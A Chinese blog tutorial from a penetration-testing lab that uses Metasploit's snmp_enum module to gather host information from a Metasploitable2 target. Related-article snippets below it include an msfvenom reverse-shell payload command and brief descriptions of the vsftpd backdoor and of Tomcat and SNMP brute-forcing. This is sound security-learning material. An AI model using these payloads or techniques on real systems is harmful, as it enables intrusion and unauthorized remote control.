渗透测试 — Metasploit 内网渗透三 —— Metasploit 渗透测试之信息搜集2 ——基于SNMP协议收集主机信息

于 2024-05-06 16:57:21 发布
阅读量531 收藏 14
点赞数 15
文章标签: tcp/ip 网络协议 网络 模块测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63701503/article/details/138500277
版权

实验内网渗透环境

Metasploitable2-linux:靶机 192.168.234.8

kali-debian:攻击机 192.168.234.141

win7 虚拟机:靶机 192.168.234.158

                

在此声明文章仅供相互学习参考,严禁利用于违法犯忌,任何事故自行承担!!
                        

基于SNMP协议收集主机信息        ——靶机:Metasploitable2-linux

SNMP(Simple Network Management Protocol,简单网络管理协议)是用于网络设备(如路由器、交换机、服务器等)远程监控、配置和管理的一种应用层协议。

                                        ——相对于tcp收集的信息回更多一些

   本次实验操作步骤:

  1. 登录靶机,修改并重启snmp服务         ——使服务能够正常监听
  2. 使用auxiliary/scanner/snmp/snmp_enum模块进行snmp 协议探测

                ——可探测服务器硬件信息和服务器当前运行的进程,这两方面是其他扫描方式,获取不到的。

        使用 root 用户登录 Metasploitable2-Linux 主机,修改 SNMP 服务,因为默认服务不对外开放

        进入root目录,才能进行后续操作         ——Metasploitable2-Linux机上操作

msfadmin@metasploitable:~# vim /etc/default/snmpd

                                        ——进入/etc/default/snmpd下的文本编译器

msfadmin@metasploitable:~$ sudo /etc/init.d/snmpd restart         ——重启 SNMP 服务

msfadmin@metasploitable:~$ netstat -antup | grep 161        ——确认显示服务监听正常

实战-使用 snmp_enum 辅助模块通过 snmp 协议扫描目标服务器信息         ——kali机上操作

msf6 > use auxiliary/scanner/snmp/snmp_enum       

msf6 auxiliary(scanner/snmp/snmp_enum) > show options

msf6 auxiliary(scanner/snmp/snmp_enum) > set RHOSTS 192.168.234.8

msf6 auxiliary(scanner/snmp/snmp_enum) > run

        注:通过 snmp 协议探测到的信息非常多。如服务器硬件信息和服务器当前运行的进程,这两方面是其他扫描方式,获取不到的。

久久归依
关注
  • 15
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
渗透技巧-Ladon利用SNMP协议探测存活主机/操作系统版本原理与实现
K8哥哥
01-30 1445
前言 无论是渗透内网还是外网,信息收集都非常重要,只有探测出目标系统(操作系统/Web程序)、安装程序/APP等才有资格去找相应的EXP或漏洞工具对目标进行尝试利用,你连目标IP都不知道,靠运气一通乱扫描?所有漏洞都扫?人家用的是MAC或LINUX,看到开放445,你用MS17010去打?要搞清楚MS是微软的缩写MS17010只针对Windows,LNX也有SMB漏洞但不是这个编号。所以想方设法探测目标机器或收集相关信息非常重要也是第一步该做的事,只有知道存活IP才能使用其它工具扫描,或者知道系统信息又可使
渗透测试Metasploit
06-16
本套教程,我们将为大家详细讲解Metasploit的使用方法。 Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全...
Metasploit工具使用(上)
剁椒鱼头没剁椒的博客
01-28 1882
The Metasploit Framework 的简称。MSF 高度模块化,即框架由多个 module 组成,是全球最受欢迎的渗透测试工具之一。是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的shellcode ,并持续保持更新。metasploit 涵盖了渗透测试中全过程,你可以在这个框架下利用现有的 Payload进行一系列的渗透测试。在框架的目录下,有很多的目录文件,其中比较重用的有data、modules、scripts、tools、plugins等。参考链接。
2022-渗透测试-信息收集-Metasploit(基于SNMP协议)
保持微笑的博客
01-15 812
简单网络管理协议(SNMP),该协议能够支持网络管理系统,用以监测到网络上的设备是否引起管理上关注的情况。 先使用root用户到Metasploitable2-Linux主机上修改一下SNMP服务,因为默认服务是不对外开放的。 命令: vim /etc/default/snmpd 我们将只监听本机IP127.0.0.1改为0.0.0.0 重启服务 /etc/init.d/snmpd restart 查看是否处于监听状态 netstat -pantu | grep 16...
渗透测试中如何收集利用 SNMP 协议数据
weixin_33772645的博客
07-03 286
几个月前,我曾发过一篇博客” SNMP 最佳实践“讲述了一些基本的方法降低来自 SNMP 相关的安全隐患。我想现在大家应该都修复完了,那么是时候来从渗透测试的角度讲述如何通过收集分析数据来发现并利用暴露的 SNMP 服务。 第一个问题是我们如何发现暴露的 SNMP 服务。通常我们会使用端口扫描工具 Nmap 来扫描开放的 UDP 端口 161。鉴于我们只...
web渗透测试----5、暴力破解漏洞--(2)SNMP密码破解
七天
06-23 1755
SNMP暴力破解
Metasploit渗透测试指南_渗透测试_metasploit_
10-04
介绍Metasploit使用方法,进行各种各样的渗透测试
metasploit中使用lnk漏洞渗透测试.doc
03-18
Metasploit 中使用 LNK 漏洞进行渗透测试 Metasploit 是一个开源的渗透测试框架,广泛应用于网络安全测试和漏洞利用。LNK 漏洞是一种常见的 Windows 漏洞,通过exploit 可以获得目标机的shell 权限。本文将详细介绍...
Metasploit渗透测试魔鬼训练营 读书笔记
09-18
渗透测试-内网客户端渗透9.pdf 渗透测试-内网网络服务端渗透7.pdf 渗透测试-后渗透阶段10.pdf 渗透测试-实验拓扑环境4.pdf 渗透测试-情报搜集5.pdf 渗透测试-社会工程学8.pdf 渗透测试-移动环境渗透3.pdf ...
metasploit渗透测试手册
06-03
Metasploit渗透测试手册特色:, 描述方式直截了当、简单易懂;, 书中示例经过仔细甄选,涵盖了大多数常见问题;, 剖析问题直击本质,解决问题简单高效;, 步骤式解读问题的解决方案;, 书中的解决方案可以应用到其他...
渗透测试技术----服务扫描(二)--SNMP、SMB、SMTP
wwl012345的博客
07-21 2812
一、SNMP 1.SNMP介绍 SNMP(Simple Network Management Protocol)简单网络管理协议SNMP中包含两个Community Strings,一个可读,一个可写可以进行信息查询或者重新配置。SNMP系统的内部信息都是可以通过SNMP进行监控的,SNMP特定的服务都有特定的编号,比如查CPU、内存等等,每个设备都有自己的MIB库,如果你想查询思科的...
一次对SNMP服务的渗透测试
dfdhxb995397的博客
08-14 613
SNMP安全相关信息是需要各位安全开发人员,渗透测试工程师以及白帽子所需要关心的内容,在本篇文章中,作者通过对其漏洞的分析和实践直观的让读者对其相关内容进行了解。对入门学员可能会有所帮助。 Hacking SNMP Service – The Post Exploitation :Attacking Network – Network Pentesting原文地址:http://www...
kali利用ftp端口(21)漏洞攻击Metasploitable2-Linux靶机(笑脸漏洞)
qq_58018041的博客
04-22 3445
#vsftpd源码包含后门漏洞#思路:开放21端口,并且vsftpd版本号为2.3.4#原理:在特定版本的vsftpd服务器程序中,被人恶意植入代码,当用户名以“:)”结尾时,服务器就会在6200端口监听,并且能够执行任意代码。攻击机:kali :192.168.111.128靶机:Metasploitable2-Linux:192.168.111.132Metasploitable 的用户名和密码均为:msfadmin。
在KaLi Linux中使用Metasploit
sheaadens的博客
06-21 417
因此,使用Metasploit来爆破Tomcat密码,以找到计算机系统中存在的可能的漏洞和安全风险,将是非常有用的。其中,指定了目标IP地址,以及Tomcat服务器默认的8080端口,同时设置了强制暴力破解的速度。你可以打开Metasploit中的控制台,并使用漏洞扫描程序,例如Nmap,扫描目标计算机系统的IP地址,并以此查找Tomcat服务器存在的漏洞。如果你已经找到了Tomcat服务器中的漏洞,你可以使用Metasploit的攻击模块来创建一个加密的Payload,以便能够访问Tomcat服务器。
kali3、nessus 针对 Metasploitable2-Linux 渗透测试-openssl
hzwindpower的博客
01-13 865
1、kali、nessus、Metasploitable2-Linux环境已经安装完毕。 2、利用nessus对靶机进行扫描,得出许多安全漏洞 3、从下到下依次开始进行测试如图: 4、点开链接,得出该漏洞CVE ID为 CVE-2008-0166 http://www.nessus.org/u?107f9bdc http://www.nessus.org/u?f14f4224 包:openssl 漏洞:可预测的随机数生成器 问题类型:远程 Debian专用:是 CVE ID:CVE-2008-0166 L
使用msfvenom实现远程控制.
2301_78457119的博客
06-24 665
在Kali 2中生成被控端的工具:msfvenom(msfvenom是渗透测试工具Metasploit中的一个命令)1、查看帮助信息、查2.看所有可以使用的攻击模块3、筛选出使用reverse_tcp模块
记kali下使用metasploit木马进行远程控制
m0_46371267的博客
05-11 1063
环境:ubuntun+kali2020.4 本次实验需要两台虚拟机kali及ubuntun 注:kali地址为192.168.147.137 ubuntun的地址为192.168.147.129 本人使用ssh链接 ssh链接ubuntun 并进入root权限 ssh链接kali 在kali下root权限下生成payload(也就是木马) msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.147.137 LPORT=4444 -
基于SNMP的交换机入侵的内网渗透
weixin_30678821的博客
07-08 1365
前言:局域网在管理中常常使用SNMP协议来进行设备的管理和监控,而SNMP的弱点也成为了我们此次渗透的关键。 使用SNMP管理设备只需要一个community string,而这个所谓的密码经常采用默认public/private或者弱口令,而且对SNMP口令进行爆破或字典猜解比较容易。这为我们扫描交换机并对他们进行管理提供了方便。 首先我们要搞定一个在内网的服务器作为跳板,通过观察和扫描其所...
metasploit渗透测试
最新发布
08-02
Metasploit是一个渗透测试工具,也是信息安全与渗透测试领域最大的开源项目之一。它可以帮助您查找、利用和验证漏洞,并附带了数百个已知软件漏洞的专业级漏洞攻击工具。Metasploit的设计初衷是打造成一个攻击工具...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值